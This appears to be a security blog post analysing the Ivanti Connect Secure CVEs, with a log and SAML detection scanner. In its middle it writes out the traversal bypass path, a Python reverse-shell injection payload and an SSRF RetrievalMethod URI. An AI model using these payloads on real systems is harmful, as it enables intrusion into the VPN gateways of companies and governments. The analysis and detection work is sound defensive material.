Overview
Recently, five CVEs have been discovered in Ivanti Connect Secure, a software product designed to offer secure remote access to corporate resources and applications. This product is currently trusted by numerous service providers and government entities. These vulnerabilities encompass authentication bypass, command injection, privilege escalation, server-side request forgery, and XML external entity issues, potentially resulting in remote code execution on affected systems. The presence of public exploits in the wild raises significant security concerns for users of this product.
According to the FOFA search engine, over 20,000 exposed servers are potentially exploitable if they have not yet been patched.
Orange Tsai shared CVE severity statistics for the most widely used VPN vendors. Pulse Secure had the lowest rate, but that rate rose at the beginning of this year.
A short summary of the five vulnerabilities in Ivanti's knowledge base article shows that the impact on companies using the solution is high.
The timeline of the CVE patching and related events shows a gap between the discovery and the mitigation of the first two CVEs, CVE-2023-46805 and CVE-2024-21887. These CVEs were identified in the second week of December and were exploited as a chain to achieve remote code execution inside the victim network. This posed a significant threat from the time of discovery until patches were released for all servers exposed on the public internet.
CVE-2023-46805 is an authentication bypass in the REST API. It was exploited by requesting /api/v1/cav/client/status/../../admin/options; this mechanism was documented in an Assetnote blog post and then chained with CVE-2024-21887 across several vulnerable endpoints to achieve command injection, since the affected endpoints are served by a Python-based backend. The injected payload was:
;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';
TCP reverse shell
CVE-2024-21893 is a server-side request forgery that is reachable when the application uses SAML for authentication. It was exploited by sending an XML document that references http://127.0.0.1:8090/api/v1/license/keys-status/ through the RetrievalMethod element, which triggers the vulnerability.
As shown in the PoC below:
The attacker_server variable is set to http://attackerserver+;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("serverip",port));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'; so that a reverse shell connects back to the attacker's server_host and port.
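From a detection standpoint, the two chains above leave recognisable traces: the bypass sends path-traversal segments into the REST API, the injection appends a ;python -c marker to a request, and the SSRF carries a RetrievalMethod URI pointing at the loopback license endpoint. The following scanner is an added example, not code from the post or from Ivanti; the access-log lines and SAML fragment are constructed samples, and the log format and internal address ranges are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not real traffic). The request targets mirror the
# endpoints named in the post; the ';python -c' marker is what the injection chain looks like.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2024:10:01:02 +0000] "GET /api/v1/cav/client/status/../../admin/options HTTP/1.1" 200 512
10.0.0.5 - - [12/Jan/2024:10:01:03 +0000] "GET /api/v1/license/keys-status/;python%20-c%20%27import%20socket%27 HTTP/1.1" 200 88
10.0.0.9 - - [12/Jan/2024:10:02:00 +0000] "GET /api/v1/cav/client/status HTTP/1.1" 200 211
"""
# Constructed SAML KeyInfo fragment whose RetrievalMethod URI targets the loopback license endpoint.
SAMPLE_SAML = ('<KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">'
               '<RetrievalMethod URI="http://127.0.0.1:8090/api/v1/license/keys-status/"/></KeyInfo>')

# Assumed common-log-format layout: src ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
INJECTION_RE = re.compile(r';\s*python3?\s+-c\b')
DS_NS = '{http://www.w3.org/2000/09/xmldsig#}'
INTERNAL_HOSTS = ('127.0.0.1', 'localhost', '::1')

def scan_log(text):
    """Flag REST API requests that carry path traversal or a shell-injection marker."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m['target'])            # undo %2e%2e / %20 encoding before matching
        reasons = []
        if '/..' in urlsplit(decoded).path:       # traversal out of an unauthenticated prefix
            reasons.append('path_traversal')
        if INJECTION_RE.search(decoded):          # ';python -c' appended to a parameter
            reasons.append('command_injection')
        if reasons:
            findings.append({'src': m['src'], 'target': m['target'], 'reasons': reasons})
    return findings

def ssrf_retrieval_uris(xml_text):
    """Return RetrievalMethod URIs that point at loopback or RFC1918 hosts (SSRF attempt)."""
    hits = []
    for el in ET.fromstring(xml_text).iter(DS_NS + 'RetrievalMethod'):
        uri = el.get('URI', '')
        host = urlsplit(uri).hostname or ''
        if host in INTERNAL_HOSTS or host.startswith(('10.', '192.168.')):
            hits.append(uri)
    return hits
```

Feeding real access logs and intercepted SAML requests through these two functions gives a starting point for hunting the exploitation chain described above.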
Mitigation
The advisory recommends that customers factory reset their devices and apply the patches.
Conclusion
This post shows that nothing can be considered entirely secure, even seemingly robust applications. Companies must take a proactive approach, with regular security code reviews, to identify vulnerabilities before attackers exploit them to the detriment of customers. It is worth highlighting that Ivanti, used by governments and service providers, is particularly exposed, placing these entities in a critical position. In cybersecurity, absolute security does not exist, which is why continual effort and diligence are needed to safeguard against potential threats and protect the interests of both companies and customers.